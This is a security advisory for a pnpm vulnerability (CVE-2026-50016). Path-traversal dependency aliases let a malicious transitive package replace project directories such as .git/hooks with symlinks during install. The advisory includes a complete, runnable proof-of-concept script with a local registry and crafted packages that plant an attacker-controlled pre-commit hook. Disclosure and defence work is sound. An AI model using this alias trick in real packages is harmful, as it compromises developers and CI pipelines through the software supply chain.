GHSA-HWX4-2J3J-G496
Vulnerability from github – Published: 2026-06-26 22:55 – Updated: 2026-06-26 22:55Summary
pnpm allows a transitive dependency alias from registry package metadata to contain path traversal segments. During install, pnpm later uses that alias as a filesystem path when linking dependency nodes. As a result, a registry package can cause pnpm install - ignore-scripts to replace paths in the current project with symlinks to attacker-controlled dependency package directories.
.git/hooks is only one useful target. The same primitive can replace other project-local paths that are consumed by later tools, for example:
.huskyor.githooksfor Git hook dispatchersscripts/,tools/,bin/, ortests/for project scripts and CI commands.github/actions/<name>for local GitHub Actions used later in the workflowdist/or other publish/build output directories beforepnpm packorpnpm publishnode_modules/.binor undeclarednode_modules/<name>paths used by later command or module resolution
Targets that are regular files can also be replaced with symlinks to a package directory, but those cases are usually denial of service. Directory targets are more useful because many developer tools execute or load files from those directories after installation.
This was reproduced with pnpm@11.2.1.
Impact
Users often run pnpm install --ignore-scripts expecting that untrusted package code cannot execute during installation. This issue bypasses that expectation: the malicious package does not need a lifecycle script. Instead, it silently rewires project files or directories during install, and the payload runs when the user or CI later executes another normal command.
Examples include git commit, pnpm test, pnpm run build, a CI step that uses a local GitHub Action, or pnpm publish packaging a replaced dist/ directory. In this PoC, the victim installs a normal registry package, the transitive malicious package replaces .git/hooks, and the payload runs when the victim later executes git commit.
Root Cause
pnpm preserves dependency alias names from package metadata and later passes those aliases into dependency linking as path components. The alias is joined with the destination node_modules directory and passed to the symlink creation logic without rejecting .. segments or checking that the normalized result stays inside the intended node_modules directory.
Conceptually, a transitive alias like this:
{
"@x/../../../../../.git/hooks": "npm:payload-hooks@1.0.0"
}
is eventually treated like:
path.join(parentPackageNodeModulesDir, "@x/../../../../../.git/hooks")
The normalized destination escapes the dependency's node_modules directory and lands at the victim project's .git/hooks path. pnpm then creates a symlink at that escaped destination to the resolved payload-hooks package directory.
The dependency chain is:
victim installs normal@1.0.0
normal@1.0.0 -> bad@1.0.0
bad@1.0.0 -> payload-hooks@1.0.0 through a traversal alias
The malicious transitive package metadata contains:
{
"@x/../../../../../.git/hooks": "npm:payload-hooks@1.0.0"
}
Because this uses an npm: registry alias, it does not rely on a transitive file: or link: dependency.
Proof Of Concept
Run:
./run.sh
#!/bin/sh
set -eu
SCRIPT_DIR=$(CDPATH= cd -- "$(dirname -- "$0")" && pwd)
WORKDIR="$SCRIPT_DIR/demo-workdir"
REGISTRY_DIR="$WORKDIR/registry"
TARBALLS_DIR="$REGISTRY_DIR/tarballs"
VICTIM_DIR="$WORKDIR/victim"
READY_FILE="$WORKDIR/registry-ready"
PORT_FILE="$WORKDIR/registry-port"
rm -rf "$WORKDIR"
mkdir -p "$REGISTRY_DIR/payload-hooks" "$REGISTRY_DIR/bad" "$REGISTRY_DIR/normal" "$TARBALLS_DIR" "$VICTIM_DIR"
cat > "$REGISTRY_DIR/payload-hooks/package.json" <<'JSON'
{
"name": "payload-hooks",
"version": "1.0.0",
"bin": {
"pre-commit": "pre-commit"
},
"files": [
"pre-commit"
]
}
JSON
cat > "$REGISTRY_DIR/payload-hooks/pre-commit" <<'EOF'
#!/bin/sh
echo PWNED >&2
exit 0
EOF
chmod +x "$REGISTRY_DIR/payload-hooks/pre-commit"
cat > "$REGISTRY_DIR/bad/package.json" <<'JSON'
{
"name": "bad",
"version": "1.0.0",
"description": "transitive registry package",
"dependencies": {
"@x/../../../../../.git/hooks": "npm:payload-hooks@1.0.0"
}
}
JSON
cat > "$REGISTRY_DIR/normal/package.json" <<'JSON'
{
"name": "normal",
"version": "1.0.0",
"description": "normal looking package from a registry",
"dependencies": {
"bad": "1.0.0"
}
}
JSON
(cd "$REGISTRY_DIR/payload-hooks" && npm pack --pack-destination "$TARBALLS_DIR" --silent >/dev/null)
(cd "$REGISTRY_DIR/bad" && npm pack --pack-destination "$TARBALLS_DIR" --silent >/dev/null)
(cd "$REGISTRY_DIR/normal" && npm pack --pack-destination "$TARBALLS_DIR" --silent >/dev/null)
node - "$REGISTRY_DIR" "$READY_FILE" "$PORT_FILE" <<'NODE' &
const http = require('node:http')
const fs = require('node:fs')
const path = require('node:path')
const { execFileSync } = require('node:child_process')
const [registryDir, readyFile, portFile] = process.argv.slice(2)
const tarballsDir = path.join(registryDir, 'tarballs')
function shasum (filename) {
return execFileSync('openssl', ['dgst', '-sha1', path.join(tarballsDir, filename)])
.toString()
.trim()
.split(/\s+/)
.pop()
}
function integrity (filename) {
return 'sha512-' + execFileSync('openssl', ['dgst', '-sha512', '-binary', path.join(tarballsDir, filename)])
.toString('base64')
}
function packument (pkgName, req) {
const filename = `${pkgName}-1.0.0.tgz`
const manifest = JSON.parse(fs.readFileSync(path.join(registryDir, pkgName, 'package.json'), 'utf8'))
const origin = `http://${req.headers.host}`
return {
name: pkgName,
'dist-tags': {
latest: '1.0.0',
},
versions: {
'1.0.0': {
...manifest,
dist: {
tarball: `${origin}/${pkgName}/-/${filename}`,
shasum: shasum(filename),
integrity: integrity(filename),
},
},
},
}
}
const server = http.createServer((req, res) => {
const pathname = new URL(req.url, 'http://local.invalid').pathname
if (req.method !== 'GET') {
res.writeHead(405)
res.end('method not allowed')
return
}
if (pathname === '/normal' || pathname === '/bad' || pathname === '/payload-hooks') {
const pkgName = pathname.slice(1)
res.writeHead(200, { 'content-type': 'application/json' })
res.end(JSON.stringify(packument(pkgName, req)))
return
}
const tarballMatch = pathname.match(/^\/(normal|bad|payload-hooks)\/-\/(.+\.tgz)$/)
if (tarballMatch) {
const file = path.join(tarballsDir, tarballMatch[2])
res.writeHead(200, { 'content-type': 'application/octet-stream' })
fs.createReadStream(file).pipe(res)
return
}
res.writeHead(404)
res.end('not found')
})
server.listen(0, '127.0.0.1', () => {
fs.writeFileSync(portFile, String(server.address().port))
fs.writeFileSync(readyFile, 'ready')
})
NODE
REGISTRY_PID=$!
trap 'kill "$REGISTRY_PID" 2>/dev/null || true' EXIT INT TERM
WAIT_COUNT=0
while [ ! -f "$READY_FILE" ]; do
WAIT_COUNT=$((WAIT_COUNT + 1))
if [ "$WAIT_COUNT" -gt 100 ]; then
echo "local registry did not start" >&2
exit 1
fi
sleep 0.05
done
REGISTRY_PORT=$(cat "$PORT_FILE")
cd "$VICTIM_DIR"
git init -q
git config user.email demo@example.invalid
git config user.name "Demo User"
cat > package.json <<'JSON'
{
"name": "victim",
"version": "1.0.0"
}
JSON
cat > .npmrc <<EOF
registry=http://127.0.0.1:$REGISTRY_PORT/
EOF
printf 'pnpm: '
pnpm --version
printf 'registry: http://127.0.0.1:%s/\n' "$REGISTRY_PORT"
printf 'victim: %s\n\n' "$VICTIM_DIR"
pnpm install normal@1.0.0 --ignore-scripts --config.confirmModulesPurge=false --reporter=silent
echo 'trigger commit' > change.txt
git add change.txt
set +e
COMMIT_STDERR=$(git commit -m 'trigger pre-commit' 2>&1 >/dev/null)
COMMIT_STATUS=$?
set -e
printf '\ngit commit exit code: %s\n' "$COMMIT_STATUS"
printf 'git commit stderr:\n%s\n' "$COMMIT_STDERR"
The script starts a local npm-compatible registry, writes a victim project .npmrc that points to that registry, installs normal@1.0.0 with --ignore-scripts, and then triggers git commit.
Requirements:
pnpm
npm
node
git
openssl
Expected output:
git commit exit code: 0
git commit stderr:
PWNED
PWNED is printed by the attacker-controlled pre-commit hook from the payload-hooks package.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.34.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-50016"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-26T22:55:51Z",
"nvd_published_at": "2026-06-25T18:16:39Z",
"severity": "HIGH"
},
"details": "## Summary\n\npnpm allows a transitive dependency alias from registry package metadata to contain path traversal segments. During install, pnpm later uses that alias as a filesystem path when linking dependency nodes. As a result, a registry package can cause `pnpm install - ignore-scripts` to replace paths in the current project with symlinks to attacker-controlled dependency package directories.\n\n`.git/hooks` is only one useful target. The same primitive can replace other project-local paths that are consumed by later tools, for example:\n\n- `.husky` or `.githooks` for Git hook dispatchers\n- `scripts/`, `tools/`, `bin/`, or `tests/` for project scripts and CI commands\n- `.github/actions/\u003cname\u003e` for local GitHub Actions used later in the workflow\n- `dist/` or other publish/build output directories before `pnpm pack` or\n `pnpm publish`\n- `node_modules/.bin` or undeclared `node_modules/\u003cname\u003e` paths used by later\n command or module resolution\n\nTargets that are regular files can also be replaced with symlinks to a package directory, but those cases are usually denial of service. Directory targets are more useful because many developer tools execute or load files from those directories after installation.\n\nThis was reproduced with `pnpm@11.2.1`.\n\n## Impact\n\nUsers often run `pnpm install --ignore-scripts` expecting that untrusted package code cannot execute during installation. This issue bypasses that expectation: the malicious package does not need a lifecycle script. Instead, it silently rewires project files or directories during install, and the payload runs when the user or CI later executes another normal command.\n\nExamples include `git commit`, `pnpm test`, `pnpm run build`, a CI step that uses a local GitHub Action, or `pnpm publish` packaging a replaced `dist/` directory. In this PoC, the victim installs a normal registry package, the transitive malicious package replaces `.git/hooks`, and the payload runs when the victim later executes `git commit`.\n\n## Root Cause\n\npnpm preserves dependency alias names from package metadata and later passes those aliases into dependency linking as path components. The alias is joined with the destination `node_modules` directory and passed to the symlink creation logic without rejecting `..` segments or checking that the normalized result stays inside the intended `node_modules` directory.\n\nConceptually, a transitive alias like this:\n\n```json\n{\n \"@x/../../../../../.git/hooks\": \"npm:payload-hooks@1.0.0\"\n}\n```\n\nis eventually treated like:\n\n```text\npath.join(parentPackageNodeModulesDir, \"@x/../../../../../.git/hooks\")\n```\n\nThe normalized destination escapes the dependency\u0027s `node_modules` directory and lands at the victim project\u0027s `.git/hooks` path. pnpm then creates a symlink at that escaped destination to the resolved `payload-hooks` package directory.\n\nThe dependency chain is:\n\n```text\nvictim installs normal@1.0.0\nnormal@1.0.0 -\u003e bad@1.0.0\nbad@1.0.0 -\u003e payload-hooks@1.0.0 through a traversal alias\n```\n\nThe malicious transitive package metadata contains:\n\n```json\n{\n \"@x/../../../../../.git/hooks\": \"npm:payload-hooks@1.0.0\"\n}\n```\n\nBecause this uses an `npm:` registry alias, it does not rely on a transitive `file:` or `link:` dependency.\n\n## Proof Of Concept\n\nRun:\n\n```sh\n./run.sh\n```\n\n``` sh\n#!/bin/sh\nset -eu\n\nSCRIPT_DIR=$(CDPATH= cd -- \"$(dirname -- \"$0\")\" \u0026\u0026 pwd)\nWORKDIR=\"$SCRIPT_DIR/demo-workdir\"\nREGISTRY_DIR=\"$WORKDIR/registry\"\nTARBALLS_DIR=\"$REGISTRY_DIR/tarballs\"\nVICTIM_DIR=\"$WORKDIR/victim\"\nREADY_FILE=\"$WORKDIR/registry-ready\"\nPORT_FILE=\"$WORKDIR/registry-port\"\n\nrm -rf \"$WORKDIR\"\nmkdir -p \"$REGISTRY_DIR/payload-hooks\" \"$REGISTRY_DIR/bad\" \"$REGISTRY_DIR/normal\" \"$TARBALLS_DIR\" \"$VICTIM_DIR\"\n\ncat \u003e \"$REGISTRY_DIR/payload-hooks/package.json\" \u003c\u003c\u0027JSON\u0027\n{\n \"name\": \"payload-hooks\",\n \"version\": \"1.0.0\",\n \"bin\": {\n \"pre-commit\": \"pre-commit\"\n },\n \"files\": [\n \"pre-commit\"\n ]\n}\nJSON\n\ncat \u003e \"$REGISTRY_DIR/payload-hooks/pre-commit\" \u003c\u003c\u0027EOF\u0027\n#!/bin/sh\necho PWNED \u003e\u00262\nexit 0\nEOF\nchmod +x \"$REGISTRY_DIR/payload-hooks/pre-commit\"\n\ncat \u003e \"$REGISTRY_DIR/bad/package.json\" \u003c\u003c\u0027JSON\u0027\n{\n \"name\": \"bad\",\n \"version\": \"1.0.0\",\n \"description\": \"transitive registry package\",\n \"dependencies\": {\n \"@x/../../../../../.git/hooks\": \"npm:payload-hooks@1.0.0\"\n }\n}\nJSON\n\ncat \u003e \"$REGISTRY_DIR/normal/package.json\" \u003c\u003c\u0027JSON\u0027\n{\n \"name\": \"normal\",\n \"version\": \"1.0.0\",\n \"description\": \"normal looking package from a registry\",\n \"dependencies\": {\n \"bad\": \"1.0.0\"\n }\n}\nJSON\n\n(cd \"$REGISTRY_DIR/payload-hooks\" \u0026\u0026 npm pack --pack-destination \"$TARBALLS_DIR\" --silent \u003e/dev/null)\n(cd \"$REGISTRY_DIR/bad\" \u0026\u0026 npm pack --pack-destination \"$TARBALLS_DIR\" --silent \u003e/dev/null)\n(cd \"$REGISTRY_DIR/normal\" \u0026\u0026 npm pack --pack-destination \"$TARBALLS_DIR\" --silent \u003e/dev/null)\n\nnode - \"$REGISTRY_DIR\" \"$READY_FILE\" \"$PORT_FILE\" \u003c\u003c\u0027NODE\u0027 \u0026\nconst http = require(\u0027node:http\u0027)\nconst fs = require(\u0027node:fs\u0027)\nconst path = require(\u0027node:path\u0027)\nconst { execFileSync } = require(\u0027node:child_process\u0027)\n\nconst [registryDir, readyFile, portFile] = process.argv.slice(2)\nconst tarballsDir = path.join(registryDir, \u0027tarballs\u0027)\n\nfunction shasum (filename) {\n return execFileSync(\u0027openssl\u0027, [\u0027dgst\u0027, \u0027-sha1\u0027, path.join(tarballsDir, filename)])\n .toString()\n .trim()\n .split(/\\s+/)\n .pop()\n}\n\nfunction integrity (filename) {\n return \u0027sha512-\u0027 + execFileSync(\u0027openssl\u0027, [\u0027dgst\u0027, \u0027-sha512\u0027, \u0027-binary\u0027, path.join(tarballsDir, filename)])\n .toString(\u0027base64\u0027)\n}\n\nfunction packument (pkgName, req) {\n const filename = `${pkgName}-1.0.0.tgz`\n const manifest = JSON.parse(fs.readFileSync(path.join(registryDir, pkgName, \u0027package.json\u0027), \u0027utf8\u0027))\n const origin = `http://${req.headers.host}`\n return {\n name: pkgName,\n \u0027dist-tags\u0027: {\n latest: \u00271.0.0\u0027,\n },\n versions: {\n \u00271.0.0\u0027: {\n ...manifest,\n dist: {\n tarball: `${origin}/${pkgName}/-/${filename}`,\n shasum: shasum(filename),\n integrity: integrity(filename),\n },\n },\n },\n }\n}\n\nconst server = http.createServer((req, res) =\u003e {\n const pathname = new URL(req.url, \u0027http://local.invalid\u0027).pathname\n if (req.method !== \u0027GET\u0027) {\n res.writeHead(405)\n res.end(\u0027method not allowed\u0027)\n return\n }\n if (pathname === \u0027/normal\u0027 || pathname === \u0027/bad\u0027 || pathname === \u0027/payload-hooks\u0027) {\n const pkgName = pathname.slice(1)\n res.writeHead(200, { \u0027content-type\u0027: \u0027application/json\u0027 })\n res.end(JSON.stringify(packument(pkgName, req)))\n return\n }\n const tarballMatch = pathname.match(/^\\/(normal|bad|payload-hooks)\\/-\\/(.+\\.tgz)$/)\n if (tarballMatch) {\n const file = path.join(tarballsDir, tarballMatch[2])\n res.writeHead(200, { \u0027content-type\u0027: \u0027application/octet-stream\u0027 })\n fs.createReadStream(file).pipe(res)\n return\n }\n res.writeHead(404)\n res.end(\u0027not found\u0027)\n})\n\nserver.listen(0, \u0027127.0.0.1\u0027, () =\u003e {\n fs.writeFileSync(portFile, String(server.address().port))\n fs.writeFileSync(readyFile, \u0027ready\u0027)\n})\nNODE\nREGISTRY_PID=$!\ntrap \u0027kill \"$REGISTRY_PID\" 2\u003e/dev/null || true\u0027 EXIT INT TERM\n\nWAIT_COUNT=0\nwhile [ ! -f \"$READY_FILE\" ]; do\n WAIT_COUNT=$((WAIT_COUNT + 1))\n if [ \"$WAIT_COUNT\" -gt 100 ]; then\n echo \"local registry did not start\" \u003e\u00262\n exit 1\n fi\n sleep 0.05\ndone\nREGISTRY_PORT=$(cat \"$PORT_FILE\")\n\ncd \"$VICTIM_DIR\"\ngit init -q\ngit config user.email demo@example.invalid\ngit config user.name \"Demo User\"\n\ncat \u003e package.json \u003c\u003c\u0027JSON\u0027\n{\n \"name\": \"victim\",\n \"version\": \"1.0.0\"\n}\nJSON\n\ncat \u003e .npmrc \u003c\u003cEOF\nregistry=http://127.0.0.1:$REGISTRY_PORT/\nEOF\n\nprintf \u0027pnpm: \u0027\npnpm --version\nprintf \u0027registry: http://127.0.0.1:%s/\\n\u0027 \"$REGISTRY_PORT\"\nprintf \u0027victim: %s\\n\\n\u0027 \"$VICTIM_DIR\"\n\npnpm install normal@1.0.0 --ignore-scripts --config.confirmModulesPurge=false --reporter=silent\n\necho \u0027trigger commit\u0027 \u003e change.txt\ngit add change.txt\n\nset +e\nCOMMIT_STDERR=$(git commit -m \u0027trigger pre-commit\u0027 2\u003e\u00261 \u003e/dev/null)\nCOMMIT_STATUS=$?\nset -e\n\nprintf \u0027\\ngit commit exit code: %s\\n\u0027 \"$COMMIT_STATUS\"\nprintf \u0027git commit stderr:\\n%s\\n\u0027 \"$COMMIT_STDERR\"\n\n```\n\nThe script starts a local npm-compatible registry, writes a victim project `.npmrc` that points to that registry, installs `normal@1.0.0` with `--ignore-scripts`, and then triggers `git commit`.\n\nRequirements:\n\n```text\npnpm\nnpm\nnode\ngit\nopenssl\n```\n\nExpected output:\n\n```text\ngit commit exit code: 0\ngit commit stderr:\nPWNED\n```\n\n`PWNED` is printed by the attacker-controlled `pre-commit` hook from the `payload-hooks` package.",
"id": "GHSA-hwx4-2j3j-g496",
"modified": "2026-06-26T22:55:51Z",
"published": "2026-06-26T22:55:51Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-hwx4-2j3j-g496"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50016"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "pnpm: Transitive dependency alias path traversal allows project path override via symlink replacement"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.